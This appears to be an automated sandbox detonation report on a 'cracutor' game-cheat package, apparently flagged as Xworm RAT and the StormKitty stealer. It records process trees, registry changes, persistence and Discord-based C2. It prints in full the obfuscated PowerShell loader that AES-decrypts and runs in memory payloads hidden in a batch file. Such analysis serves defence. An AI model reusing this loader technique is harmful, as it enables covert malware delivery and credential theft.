N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1288 wrote to memory of 2744 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 2744 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 2744 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\cracutor.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zFCOPqZUpxhO5ciHbZM4ROMYeYlSpVgI4g7jD8zHAUY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vDZO0S7Am6YBYCRTxFXCyQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zAiLC=New-Object System.IO.MemoryStream(,$param_var); $YmoSv=New-Object System.IO.MemoryStream; $vqshj=New-Object System.IO.Compression.GZipStream($zAiLC, [IO.Compression.CompressionMode]::Decompress); $vqshj.CopyTo($YmoSv); $vqshj.Dispose(); $zAiLC.Dispose(); $YmoSv.Dispose(); $YmoSv.ToArray();}function execute_function($param_var,$param2_var){ $qmwRL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $dQiwA=$qmwRL.EntryPoint; $dQiwA.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\cracutor.bat';$kqgmW=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\cracutor.bat').Split([Environment]::NewLine);foreach ($RIPei in $kqgmW) { if ($RIPei.StartsWith(':: ')) { $flwkS=$RIPei.Substring(3); break; }}$payloads_var=[string[]]$flwkS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

Network

N/A

Files

memory/2744-4-0x000007FEF561E000-0x000007FEF561F000-memory.dmp

memory/2744-5-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp

memory/2744-6-0x000000001B340000-0x000000001B622000-memory.dmp

memory/2744-8-0x0000000002310000-0x0000000002318000-memory.dmp

memory/2744-7-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp

memory/2744-9-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp

memory/2744-10-0x000007FEF5360000-0x000007FEF5CFD000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win10v2004-20240508-en

Max time kernel

144s

Max time network

108s

Command Line

"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\ICSharpCode.AvalonEdit.xml"

Signatures

N/A

Processes

C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE

"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\ICSharpCode.AvalonEdit.xml"

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 100.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
NL 23.62.61.89:443 www.bing.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 89.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp

Files

memory/4368-1-0x00007FFCC6CED000-0x00007FFCC6CEE000-memory.dmp

memory/4368-0-0x00007FFC86CD0000-0x00007FFC86CE0000-memory.dmp

memory/4368-2-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp

memory/4368-3-0x00007FFCC6C50000-0x00007FFCC6E45000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win7-20240508-en

Max time kernel

121s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe"

Signatures

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe

"C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 scriptblox.com udp
US 172.67.68.166:443 scriptblox.com tcp

Files

memory/1688-0-0x0000000074B9E000-0x0000000074B9F000-memory.dmp

memory/1688-1-0x0000000000100000-0x00000000002FE000-memory.dmp

memory/1688-2-0x0000000074B90000-0x000000007527E000-memory.dmp

memory/1688-3-0x0000000004C60000-0x0000000004CFE000-memory.dmp

memory/1688-4-0x0000000074B90000-0x000000007527E000-memory.dmp

memory/1688-6-0x00000000005A0000-0x00000000005AA000-memory.dmp

memory/1688-5-0x00000000005A0000-0x00000000005AA000-memory.dmp

memory/1688-7-0x0000000074B9E000-0x0000000074B9F000-memory.dmp

memory/1688-11-0x0000000074B90000-0x000000007527E000-memory.dmp

memory/1688-12-0x0000000074B90000-0x000000007527E000-memory.dmp

memory/1688-14-0x00000000005A0000-0x00000000005AA000-memory.dmp

memory/1688-13-0x00000000005A0000-0x00000000005AA000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win7-20240221-en

Max time kernel

121s

Max time network

123s

Command Line

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Plz Donate Bot.txt"

Signatures

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Plz Donate Bot.txt"

Network

N/A

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win10v2004-20240508-en

Max time kernel

92s

Max time network

94s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\config.cfig"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\config.cfig"

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win7-20240220-en

Max time kernel

117s

Max time network

119s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.pdb"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pdb_auto_file\ C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\.pdb C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\.pdb\ = "pdb_auto_file" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pdb_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pdb_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pdb_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pdb_auto_file C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pdb_auto_file\shell C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.pdb"

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.pdb

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.pdb"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 9e37514ff103460380b465d4530d009a
SHA1 0b8c30d62dae5d576d2c0735abcef15610235982
SHA256 1587e9f22c1036b8f1141d5c22a952f77596a4a9ead4c4b60834af0f7c86a78d
SHA512 8545e952fea421b9be25fbbef423840c6fbb62b7a9ddc16d75b62d50d9a7122c21b42440e3dc171e42c8e0ca176df6fa366deca96361b22d236580bbd047e865

Analysis: behavioral22

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win10v2004-20240508-en

Max time kernel

143s

Max time network

133s

Command Line

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\abc.txt"

Signatures

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\abc.txt"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win7-20240220-en

Max time kernel

118s

Max time network

120s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\config.cfig"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\.cfig C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\cfig_auto_file\shell\Read C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\cfig_auto_file\shell C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\cfig_auto_file\shell\Read\command C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_Classes\Local Settings C:\Windows\system32\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\cfig_auto_file C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\cfig_auto_file\ C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\.cfig\ = "cfig_auto_file" C:\Windows\system32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\cfig_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" C:\Windows\system32\rundll32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\config.cfig"

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\config.cfig

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\config.cfig"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 0ea99233b8862c2569f2f4aa8d93831a
SHA1 28dc72da59fd83ad6f480546e42dafc6ad63bd8b
SHA256 13296307a84113f8315b21effdedc28f49156cb97b3941aec7791ea2d64c019d
SHA512 5bfe2e075eabe50f6981a24f18b1a0d04713ef32b91164da0d59b32162ecd1a02f097d6d2de0d9198fbaeba5e30b95469331525645497453bd8f2c4bfef1617a

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win7-20240215-en

Max time kernel

121s

Max time network

122s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe.config"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A
N/A N/A C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe.config"

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe.config"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 c98cd428c733d3821e753865ab588677
SHA1 7eec31bbf4b870dfdfa3f964c54dbf178c209771
SHA256 546d1061ff0bb4d2cfc3257e0178f60981e4f590930c549215b49ae2f031d2b6
SHA512 459bec257d97670d8696214da8f816c64081f8f8cb0c7067fd64eda592de82a6e56a45bd0c10a4006da7427996e628d868fe4b33cf5bc4edea02281e33194c75

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win7-20240215-en

Max time kernel

121s

Max time network

122s

Command Line

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Auto Execute\gg.txt"

Signatures

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Auto Execute\gg.txt"

Network

N/A

Files

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win7-20240508-en

Max time kernel

122s

Max time network

122s

Command Line

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\abc.txt"

Signatures

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\abc.txt"

Network

N/A

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win10v2004-20240508-en

Max time kernel

118s

Max time network

143s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\cracutor.bat"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\klxcnl.exe C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\klxcnl.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2492 wrote to memory of 1884 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2492 wrote to memory of 1884 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1884 wrote to memory of 2576 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe
PID 1884 wrote to memory of 2576 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe
PID 1884 wrote to memory of 2576 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe
PID 1884 wrote to memory of 1704 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
